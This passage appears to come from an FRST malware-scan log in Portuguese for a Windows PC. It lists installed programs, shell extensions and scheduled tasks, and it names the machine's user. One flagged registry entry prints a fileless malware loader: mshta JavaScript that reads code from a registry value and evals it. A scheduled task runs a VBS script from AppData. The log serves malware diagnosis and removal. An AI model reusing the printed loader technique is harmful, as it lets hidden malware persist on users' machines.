Catalyst Control Center Next Localization TR (HKLM\...\{0B5633F0-C415-2F08-671E-4C9E2FAACD45}) (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{89A1F076-19B8-A2B1-D5A3-E8247EFAF157}) (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version:  - Progdigy Software S.A.R.L.)
Cheat Engine 6.5.1 (HKLM-x32\...\Cheat Engine 6.5.1_is1) (Version:  - Cheat Engine)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
Consolas Font Family (HKLM-x32\...\{6AE22174-4FFA-4572-B692-31F0C386ED38}) (Version: 1.00.0000 - Microsoft Corporation)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 4.1.0.0489 - Disc Soft Ltd)
Dark Souls III (HKLM-x32\...\Dark Souls III_is1) (Version:  - )
Dell Customer Connect (HKLM-x32\...\{124DE80C-9BFE-4D04-A8D9-69C5019DEEBF}) (Version: 1.3.28.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{BC8233D8-59BA-4D40-92B9-4FDE7452AA8B}) (Version: 3.0.3999.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{C1C53DA1-9497-4ABB-A3D6-A63039820B37}) (Version: 3.3.7200.0 - Dell Inc.)
Dell Foundation Services (HKLM\...\{D605CD24-103D-4DB6-B572-653851213C46}) (Version: 2.2.65.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{24F2AD94-CC1B-4294-B184-D4D31A3186A7}) (Version: 2.42.0012 - Aviata Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 2.0.6875.402 - Dell)
Dell SupportAssistAgent (HKLM\...\{90881C8E-6C4F-4662-9923-85AFCA058C44}) (Version: 2.0.1.7 - Dell)
Dell System Detect (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.55 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Diablo III (HKLM-x32\...\Diablo III) (Version:  - Blizzard Entertainment)
Discord (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dont Starve - Shipwrecked (HKLM-x32\...\Dont Starve - Shipwrecked_is1) (Version:  - )
Driver Booster 4.4 (HKLM-x32\...\Driver Booster_is1) (Version: 4.4.0 - IObit)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 0.9.0 - Dropbox, Inc.)
Duplicate Cleaner Pro 4.0.3 (HKLM-x32\...\Duplicate Cleaner Pro) (Version: 4.0.3 - DigitalVolcano Software Ltd)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version:  - )
FreeMouseAutoClicker 3.8.2 (HKLM-x32\...\{292F00C5-25EF-4FBE-9873-13EF1F69DEED}_is1) (Version:  - Advanced Mouse Auto Clicker ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 59.0.3071.115 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of Might and Magic V - Tribes of the East (HKLM-x32\...\1207661193_is1) (Version: 2.1.0.24 - GOG.com)
Heroes of Might and Magic V with Hammers of Fate (HKLM-x32\...\1207661143_is1) (Version: 2.1.0.22 - GOG.com)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.6.0.1045 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.5.0.1056 - Intel Corporation)
Intel® Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Intel® WiDi (HKLM\...\{2F97FBC6-7992-4DF7-A7C7-B68455E307F7}) (Version: 5.1.20.0 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{E2FEF167-A654-48D5-BA41-0C3B5B91FE4E}) (Version: 18.1.1546.2762 - Intel Corporation)
IObit Malware Fighter 5 (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 5.1 - IObit)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 6.4.0.2119 - IObit)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Kerbal Space Program (HKLM-x32\...\1429864849_is1) (Version: 2.4.0.6 - GOG.com)
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.1.5.8 - PandoraTV)
Malwarebytes versão 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Mass Effect™: Andromeda (HKLM-x32\...\{72BBCA87-9350-48BC-9E2F-6DBC1E80C993}) (Version: 1.0.0.4 - Electronic Arts)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.7.8942.2 - Waves Audio Ltd.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Might & Magic Heroes VII Update v1.3 (HKLM\...\TWlnaHRNYWdpY0hlcm9lc1ZJSQ==_is1) (Version: 1 - )
Might and Magic Heroes VII (HKLM-x32\...\Might and Magic Heroes VII_is1) (Version:  - )
MobiKin Doctor for Android (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\MobiKin Doctor for Android) (Version: 3.0.19 - MobiKin)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
Nox APP Player (HKLM-x32\...\Nox) (Version: 3.8.3.1 - Duodian Technology Co. Ltd.)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{1D464EFF-EC8B-F225-2F74-F74143200DDF}) (Version: 1.00.0000 - Nome de sua empresa:)
Pacote de Driver do Windows - Intel Corporation (iaStorA) HDC  (04/21/2016 14.8.9.1053) (HKLM\...\CD9B4AE79021660F0D350F3B47AF8FEB680EC9D0) (Version: 04/21/2016 14.8.9.1053 - Intel Corporation)
Pacote de Driver do Windows - Intel Corporation (iaStorA) SCSIAdapter  (04/21/2016 14.8.9.1053) (HKLM\...\6973B84EB0AFD7F3DF921DBA71F34B6AFAFB5ED7) (Version: 04/21/2016 14.8.9.1053 - Intel Corporation)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2-r5875) (Version:  - )
Pcsx2 0.9.1 Watermoose (HKLM-x32\...\Pcsx2_is1) (Version:  - Pcsx2 Team)
PX Profile Update (HKLM-x32\...\{79DB4FB1-2556-27C8-C606-1A0DD3E315B9}) (Version: 1.00.1. - AMD) Hidden
qBittorrent 3.3.13 (HKLM-x32\...\qBittorrent) (Version: 3.3.13 - The qBittorrent project)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.014 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31233 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.3.723.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
ScpToolkit (HKLM\...\{AC052048-9828-45E3-872B-04CE30A3B58B}) (Version: 1.6.238.16010 - Nefarius Software Solutions)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.24 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.24.104 - Skype Technologies S.A.)
Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.6.0 - IObit)
Software de dispositivo do Chipset Intel® (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel® Corporation) Hidden
Software Intel® PROSet/Wireless (HKLM-x32\...\{638b58cc-a268-482a-b0b2-4f2e25993cc1}) (Version: 19.20.0 - Intel Corporation)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stremio (HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Stremio) (Version: 3.6.5 - Smart Code Ltd.)
Superb Game Boost 3.1 (HKLM-x32\...\SuperbGameBoost_is1) (Version: 3.1 - )
The Elder Scrolls Legends (HKLM-x32\...\The Elder Scrolls Legends) (Version:  - Bethesda Softworks)
The Elder Scrolls V Skyrim - Legendary Edition (HKLM-x32\...\The Elder Scrolls V Skyrim - Legendary Edition_is1) (Version:  - )
True Color (HKLM\...\{33D499E3-73E8-44D5-8D1F-FEA39535E9F2}) (Version: 6.0.0.6 - Entertainment Experience LLC) Hidden
True Color (HKLM-x32\...\{55c734b2-fcff-447e-81cc-a6f04ebf09fc}) (Version: 6.0.0.6 - Entertainment Experience)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Exame Personalizado CLSID (Whitelisted): ==========================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-459013025-3067968454-1995941679-1001_Classes\CLSID\{eb3bea66-c477-47e4-bd03-3fd09f2e436f}\InprocServer32 -> C:\WINDOWS\system32\dfshim.dll (Microsoft Corporation)
HKU\.DEFAULT\Software\Classes\15c1c1c: "C:\WINDOWS\system32\mshta.exe" "javascript:V0Mr2W="RZ9A6Jb";N2n=new ActiveXObject("WScript.Shell");rPtAR52="GaXZcEtG";Pf8X9X=N2n.RegRead("HKCU\\software\\jgsxvl\\ehwentqye");jpOrbSG1="p";eval(Pf8X9X);El3JI="uLK";" <==== ATENÇÃO
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} =>  -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} =>  -> Nenhum Arquivo
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers1: [DaemonShellExtImage] -> {40966797-8FFE-46C8-9EF8-7003F33CCF0F} => C:\Program Files (x86)\DAEMON Tools Pro\DTShl64.dll [2012-10-23] (DT Soft Ltd)
ContextMenuHandlers1: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll [2017-03-31] (IObit)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2017-03-28] (IObit)
ContextMenuHandlers1: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-03-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-03-09] (Alexander Roshal)
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers2: [DaemonShellExtDrive] -> {A5415364-784A-41A5-B47A-D452909CA8FF} => C:\Program Files (x86)\DAEMON Tools Pro\DTShl64.dll [2012-10-23] (DT Soft Ltd)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-01-20] (Malwarebytes)
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers4: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll [2017-03-31] (IObit)
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2017-03-28] (IObit)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Nenhum Arquivo
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-02-24] (Intel Corporation)
ContextMenuHandlers6: [IObit Malware Fighter] -> {0BB81440-5F42-4480-A5F7-770A6F439FC8} => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFShellExt.dll [2017-03-31] (IObit)
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2017-03-28] (IObit)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-01-20] (Malwarebytes)
ContextMenuHandlers6: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-03-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-03-09] (Alexander Roshal)
 
==================== Tarefas Agendadas (Whitelisted) =============
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
Task: {0945814C-4757-45B6-8369-9182A6714E49} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {1A1ADE13-9829-4331-9213-7764F1E76D34} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {29938D73-1F8C-4C26-8A3B-B5A49EEE09B6} - System32\Tasks\IObitSelfCheckTask => C:\Program Files (x86)\IObit\Smart Defrag\IObitSelfCheck.exe [2016-10-18] (IObit)
Task: {2AD8317F-D205-44E5-AE59-0781E8ACE7D5} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {2C956927-78EB-4437-8471-7530240E4BBF} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2017-05-29] (PC-Doctor, Inc.)
Task: {2DE7CC42-509D-40D8-A88C-D734E9CAB83F} - System32\Tasks\Dell\Dell Product Registration Update => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-10-31] (Aviata Inc)
Task: {2E3F8A75-7964-4ABE-BC83-0A4AC675FB89} - System32\Tasks\Dell\Dell Product Registration => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-10-31] (Aviata Inc)
Task: {312476A3-96F6-480C-AA9F-1426AEBEE259} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssist.exe [2017-06-28] (Dell Inc.)
Task: {34FB3448-893F-493D-ABD7-09D4BDFF762B} - System32\Tasks\{92CF0002-651B-43D2-8151-C19D7B8F7290} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {3D512BEF-0952-46F2-9FF9-8644AD67DA69} - System32\Tasks\ASC10_SkipUac_Hercílio => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2017-05-31] (IObit)
Task: {4802EE1A-6850-4BED-B2B5-D9C57716FBC8} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [2017-03-22] (IObit)
Task: {52A8E670-E955-4CA8-8174-0C75380E8481} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2017-07-14] (Realtek Semiconductor)
Task: {52B6D137-35A4-412E-B84F-405779A4C1BA} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-10-13] (Intel® Corporation)
Task: {538DCEB1-FD32-444F-B278-E6457C101F82} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {55CE1D81-E387-4B19-B73E-14252D65ED9F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {6693575E-E075-4877-8C64-BE2D6066ACC5} - System32\Tasks\Driver Booster SkipUAC (Hercílio) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe [2017-05-03] (IObit)
Task: {69E8BADB-4394-4892-87DF-C5A9163071CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {8DBC6239-677F-4B5F-A513-81FB4E682BAD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {8EAEE3FC-0BF1-432E-B16C-1496A8A5A5D6} - System32\Tasks\SuperbGameBoost => C:\Program Files (x86)\SuperBoost\Superb Game Boost\SuperbGameBoostMain.exe [2016-11-28] (SuperBoost Software)
Task: {90E7B9D3-2AEE-4EFD-90D9-033646021662} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-05-29] (PC-Doctor, Inc.)
Task: {A3579897-8536-404D-94D2-EF1EF79E9AE5} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {A8213CD5-D9EF-4E86-AB53-6596AE36500C} - System32\Tasks\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxp://ui.skype.com/ui/0/7.24.85.104/pt/abandoninstall?page=tsMain
Task: {A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {AE535F27-94A0-4DE8-A25F-8632948727EB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {AFC57FD1-0D40-42B3-8331-34813833DAF8} - System32\Tasks\SmartDefrag_Startup => C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe [2017-05-31] (IObit)
Task: {B80159A1-5CFF-47F5-8159-DD903066A604} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {B881CCAE-FDE4-44BE-B0D1-438C58A1C28F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {BB126EF1-ED45-4488-94F7-68FDD49DDFD3} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2017-05-25] (IObit)
Task: {BBC15184-8EAE-491B-8DE9-71D8B6B3C969} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\Scheduler.exe [2017-03-28] (IObit)
Task: {C1494A47-EA61-45D0-85D3-F062A5A2F0EB} - System32\Tasks\updater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-01-10] (Nefarius Software Solutions)
Task: {C57EDBA8-602A-4631-9957-4528976086C7} - System32\Tasks\PCDoctorBackgroundMonitorTask-Delay => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-05-29] (PC-Doctor, Inc.)
Task: {CD8EEB4C-84BA-4A56-88E3-0C3A8DDDA256} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {D52EB235-BE84-4E14-8C8B-FE88D28618A9} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} - System32\Tasks\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Pcsx2\pcsx2.exe" -d "C:\Program Files (x86)\Pcsx2"
Task: {E57248BA-7C3C-4415-AC77-EFF6C0603EE4} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit)
Task: {EA230FE4-0415-4E21-A56D-50F45B384B30} - System32\Tasks\RealtekUpdate => wscript "C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\RealtekUpdate.vbs"
Task: {F0F348D7-F6A1-4302-ABB4-556EA06B6589} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
